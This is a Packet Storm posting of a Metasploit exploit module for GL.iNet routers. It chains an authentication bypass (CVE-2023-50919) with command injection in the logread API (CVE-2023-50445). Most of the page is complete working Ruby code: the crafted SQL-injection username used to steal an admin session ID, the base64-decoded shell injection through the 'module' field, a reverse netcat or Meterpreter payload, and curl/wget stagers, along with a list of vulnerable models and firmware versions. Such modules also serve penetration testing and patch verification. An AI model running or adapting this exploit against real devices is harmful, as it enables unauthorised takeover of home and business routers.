exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

GL.iNet Unauthenticated Remote Command Execution

GL.iNet Unauthenticated Remote Command Execution
Posted Jan 24, 2024
Authored by h00die-gr3y, DZONERZY | Site metasploit.com

A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker to inject and execute arbitrary shell commands via JSON parameters at the gl_system_log and gl_crash_log interface in the logread module. This Metasploit exploit requires post-authentication using the Admin-Token cookie/sessionID (SID), typically stolen by the attacker. However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication through a Lua string pattern matching and SQL injection vulnerability. The Admin-Token cookie/SID can be retrieved without knowing a valid username and password. Many products are vulnerable.

tags | exploit, arbitrary, shell, sql injection
advisories | CVE-2023-50445, CVE-2023-50919
SHA-256 | b2bca998991626f23b36c98d002d2080249ea5f70d1ddbf836bc60a85c0470df

GL.iNet Unauthenticated Remote Command Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'digest/md5'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'GL.iNet Unauthenticated Remote Command Execution via the logread module.',
'Description' => %q{
A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker
to inject and execute arbitrary shell commands via JSON parameters at the `gl_system_log` and `gl_crash_log`
interface in the `logread` module.
This exploit requires post-authentication using the `Admin-Token` cookie/sessionID (`SID`), typically stolen
by the attacker.
However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication
through a `Lua` string pattern matching and SQL injection vulnerability. The `Admin-Token` cookie/`SID` can be
retrieved without knowing a valid username and password.

The following GL.iNet network products are vulnerable:
- A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A: v4.0.0 < v4.5.0;
- MT6000: v4.5.0 - v4.5.3;
- MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;
- E750/E750V2, MV1000: v4.3.8;
- X3000: v4.0.0 - v4.4.2;
- XE3000: v4.0.0 - v4.4.3;
- SFT1200: v4.3.6;
- and potentially others (just try ;-)

NOTE: Staged Meterpreter payloads might core dump on the target, so use stage-less Meterpreter payloads
when using the Linux Dropper target.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
'Unknown', # Discovery of the vulnerability CVE-2023-50445
'DZONERZY' # Discovery of the vulnerability CVE-2023-50919

],
'References' => [
['CVE', '2023-50445'],
['CVE', '2023-50919'],
['URL', 'https://attackerkb.com/topics/3LmJ0d7rzC/cve-2023-50445'],
['URL', 'https://attackerkb.com/topics/LdqSuqHKOj/cve-2023-50919'],
['URL', 'https://libdzonerzy.so/articles/from-zero-to-botnet-glinet.html'],
['URL', 'https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md']
],
'DisclosureDate' => '2023-12-10',
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],
'Privileged' => true,
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],
'Type' => :linux_dropper,
'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne'],
'Linemax' => 900,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('SID', [false, 'Session ID'])
])
end

def vuln_version?
@glinet = { 'model' => nil, 'firmware' => nil, 'arch' => nil }
# check first with version 4.x api call
post_data = {
jsonrpc: '2.0',
id: rand(1000..9999),
method: 'call',
params: [
'',
'ui',
'check_initialized',
{}
]
}.to_json

res = send_request_cgi({
'method' => 'POST',
'ctype' => 'text/json',
'uri' => normalize_uri(target_uri.path, 'rpc'),
'data' => post_data.to_s
})
if res && res.code == 200 && res.body.include?('result')
res_json = res.get_json_document
unless res_json.blank?
@glinet['model'] = res_json['result']['model']
@glinet['firmware'] = res_json['result']['firmware_version']
end
else
# check with version 3.x api call. These versions are NOT vulnerable
res = send_request_cgi({
'method' => 'GET',
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'api', 'router', 'hello')
})
if res && res.code == 200 && res.body.include?('model') && res.body.include?('version')
res_json = res.get_json_document
unless res_json.blank?
@glinet['model'] = res_json['model']
@glinet['firmware'] = res_json['version']
end
end
end

# check for the vulnerable models and firmware versions
case @glinet['model']
when 'sft1200'
@glinet['arch'] = 'mipsle'
return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.6')
when 'ar750', 'ar750s', 'ar300m', 'ar300m16'
@glinet['arch'] = 'mipsbe'
return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')
when 'mt300n-v2', 'mt1300'
@glinet['arch'] = 'mipsle'
return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')
when 'ap1300', 'b1300'
@glinet['arch'] = 'armle'
return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')
when 'e750', 'e750v2'
@glinet['arch'] = 'mipsbe'
return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')
when 'mv1000'
@glinet['arch'] = 'armle'
return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')
when 'ax1800', 'axt1800', 'a1300'
@glinet['arch'] = 'armle'
return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0')
when 'mt2500', 'mt2500a', 'mt3000'
@glinet['arch'] = 'aarch64'
return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0')
when 'mt6000'
@glinet['arch'] = 'aarch64'
return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.5.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.5.3')
when 'x3000'
@glinet['arch'] = 'aarch64'
return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.4.2')
when 'xe3000'
@glinet['arch'] = 'aarch64'
return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.4.3')
end
@glinet['arch'] = 'n/a'
return false
end

def auth_bypass
# Check if datastore['SID'] is set
return datastore['SID'] unless datastore['SID'].blank?

# Exploit CVE-2023-50919 to retrieve the SID without valid username and password.
# Send an RPC request calling the challenge method, which will return a random nonce,
# the selected root user’s salt, and the crypt’s algorithm to hash the password.
post_data = {
jsonrpc: '2.0',
id: rand(1000..9999),
method: 'challenge',
params: {
username: 'root'
}
}.to_json

res = send_request_cgi({
'method' => 'POST',
'ctype' => 'text/json',
'uri' => normalize_uri(target_uri.path, 'rpc'),
'data' => post_data.to_s
})
if res && res.code == 200 && res.body.include?('nonce')
res_json = res.get_json_document
unless res_json.blank?
nonce = res_json['result']['nonce']
end
else
fail_with(Failure::NotFound, 'Getting the random nonce failed.')
end
# Perform REGEX to lookup uid field from /etc/shadow to be used as password with manipulated root username
# Use the SQL injection part to lookup the ACLs for root stored in sqlite db
# Create the password hash which is the md5 of the concatenation of the user, password, and the retrieved nonce
username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+"
pw = '0'
hash = Digest::MD5.hexdigest("#{username}:#{pw}:#{nonce}")

# Login with the password hash and obtain the SessionID (SID)
post_data = {
jsonrpc: '2.0',
id: rand(1000..9999),
method: 'login',
params: {
username: username.to_s,
hash: hash.to_s
}
}.to_json

res = send_request_cgi({
'method' => 'POST',
'ctype' => 'text/json',
'uri' => normalize_uri(target_uri.path, 'rpc'),
'data' => post_data.to_s
})
if res && res.code == 200 && res.body.include?('sid')
res_json = res.get_json_document
unless res_json.blank?
sid = res_json['result']['sid']
end
else
fail_with(Failure::NotFound, 'Retrieving the SessionID (SID) failed.')
end
return sid
end

def execute_command(cmd, _opts = {})
payload = Base64.strict_encode64(cmd)
cmd = "echo #{payload}|openssl enc -base64 -d -A|sh"
post_data = {
jsonrpc: '2.0',
id: rand(1000..9999),
method: 'call',
params: [
@sid.to_s,
'logread',
'get_system_log',
{
lines: '',
module: "|#{cmd}"
}
]
}.to_json

return send_request_cgi({
'method' => 'POST',
'ctype' => 'text/json',
'cookie' => "Admin-Token=#{@sid}",
'uri' => normalize_uri(target_uri.path, 'rpc'),
'data' => post_data.to_s
})
end

def check
print_status("Checking if #{peer} can be exploited.")
# Check if target is a GL.iNet network device and the firmware version is vulnerable
return CheckCode::Vulnerable("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if vuln_version?

unless @glinet['firmware'].nil?
# GL.iNet network devices with firmware version 3.x that are safe from this exploit
return CheckCode::Safe("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.0.0')

# GL.iNet network devices with a firmware version 4.x or higher which still could be vulnerable unless the architecture is not available (n/a)
if @glinet['arch'] != 'n/a' && (Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0'))
return CheckCode::Safe("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}")
end
return CheckCode::Detected("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0')
end
# No GL.iNet network device or not reachable
CheckCode::Unknown('No GL.iNet network device or device is not responding.')
end

def exploit
@sid = auth_bypass
print_status("SID: #{@sid}")
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
# Don't check the response here since the server won't respond
# if the payload is successfully executed.
execute_cmdstager({ linemax: target.opts['Linemax'] })
end
end
end
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close